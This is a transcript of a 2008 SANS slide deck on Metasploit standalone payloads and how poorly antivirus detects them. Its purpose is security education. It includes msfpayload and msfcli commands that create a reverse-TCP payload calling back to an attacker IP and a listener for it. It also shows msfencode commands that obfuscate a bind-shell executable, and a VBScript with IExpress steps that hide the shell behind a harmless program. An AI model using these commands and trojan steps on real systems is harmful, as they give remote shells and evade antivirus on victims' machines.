Metasploit Payloads and Antivirus - PowerPoint PPT Presentation

1 / 15
About This Presentation
Title:

Metasploit Payloads and Antivirus

Description:

Learn how an attacker might use Metasploit standalone payloads against you ... Demonstration. See how these payloads are created ... – PowerPoint PPT presentation

Number of Views:116
Avg rating:3.0/5.0
Slides: 16
Provided by: sans4
Category:

less

Transcript and Presenter's Notes

Title: Metasploit Payloads and Antivirus


1
Metasploit Payloads and Antivirus
  • Mark Baggett
  • December 2008
  • GIAC GSEC GCIH

2
Objectives
  • Learn how an attacker might use Metasploit
    standalone payloads against you
  • See how these payloads are created, used and
    trojanized
  • Understand what level of protection to expect
    from your antivirus

3
How are they used against you?
  • Can be executed by tricking a user into running
    the payload or via an exploit that is not in the
    framework
  • Execute a payload on a fully patched system
  • Use Meterpreters advanced functionality such as
    anti-forensics, detection evasion, and pivoting
  • Scenario
  • Attacker bruteforces password to a fully patched
    machine
  • Runs Meterpreter payload and uses it to pivot
  • Uses framework to attack other hosts on DMZ

4
msfpayload
  • Generates payloads in various formats
  • Source code in C, Perl, Ruby, Java
  • Hexadecimal (RAW)
  • Binary executable formats for Win32 Linux OS X
    on Intel, PPC, iPhone
  • Java automatically selects Big Endian or Little
    Endian depending upon processor of targeted
    payload
  • You can override this with a simple modification
    to msfpayload (js_be, js_le)

5
Demonstration
  • See how these payloads are created

6
Interacting with payloads
  • Some payloads will not work standalone
  • find_port, find_tag
  • Bind shell payloads can be used outside of the
    framework
  • Others require the use of the multi/handler
    exploit

7
Using multi/handler
CREATION - LHOST is the attackers IP
./msfpayload \ windows/vncinjection/reve
rse_tcp \ LHOST192.168.100.5 X gt vncrev.exe
USE - RHOST is the victims IP
  • ./msfcli exploit/multi/handler \
    PAYLOADwindows/vncinject/reverse_tcp \
    RHOST192.168.100.3 \ DisableCourtesyShellTRUE E

8
Demonstration
  • See how these payloads are used

9
msfencode
  • Will encode a payload using one of various
    algorithms
  • Expects RAW msfpayload as input
  • -h for help
  • -l list of available encoders
  • -e encoder to use
  • -t output type
  • -b characters to avoid

10
msfencode -gt Binary
  • Binary was not a selectable output type from
    msfencode until Sept 29th 2008
  • 3 ways to create a binary
  • Add 3 lines of code to msfencode
  • Generate RAW output and use a hex editor to place
    it in a binary PE format
  • Generate C source code and compile it
  • -t exe option will encode a Windows binary

11
msfencode (continued)
  • ./msfpayload windows/shell_bind_tcp R \
    ./msfencode -e x86/shikata_ga_nia -t exe
  • ./msfpayload windows/shell_bind_tcp R \
    ./msfencode -e x86/shikata_ga_nia b\
    \x41\x42\x43 -t exe
  • Text.to_win32pe() uses /data/templates
  • Use your own binaries with PAYLOAD tag
  • To_win32pe chooses a random base relocation
    address (4 bytes at position 0x88)
  • Roll your own with template.c

12
Turning payloads into trojans
  • IExpress is a setup utility that comes with
    Windows XP
  • Can create packages that visibly execute a benign
    host program and invisibly execute a malicious
    payload
  • All you need is a small VBscript to execute your
    payload invisibly
  • Trojan payloads only temporarily avoid antivirus

13
Payload script
  • The script
  • Set WshShell WScript.CreateObject("WScript.Shell
    ")
  • WshShell.Run "mspaint.exe",1, False
  • Wshshell.Run "bindshell.exe",0, False
  • Quick IExpress Demonstration
  • See how these payloads are trojanized

14
Level of protection to expect from your antivirus
  • Expected results Low rate of detection for
    unencoded payloads and no detection for encoded
    payloads
  • Actual results No detection for unencoded
    payloads or encoded payloads
  • 2 products heuristics flagged payloads
  • Pauldotcom Episode 125 at the end of September
    2008 found 6 systems detected the payload
  • My HIPS testing yielded disappointing results
  • HD Moore has stated that version 3.2 will
    generate a new Windows Binary that is harder to
    detect.

15
Summary
  • Metasploit is a powerful framework with a diverse
    set of tools
  • Using these tools attackers can easily create
    standalone payloads that run on fully patched
    systems
  • Antivirus products do not at this time provide
    adequate protection against Metasploit payloads
  • My paper is in the SANS reading room titled
    Effectiveness of Antivirus Detecting Metasploit
    Payloads
Write a Comment
User Comments (0)
About PowerShow.com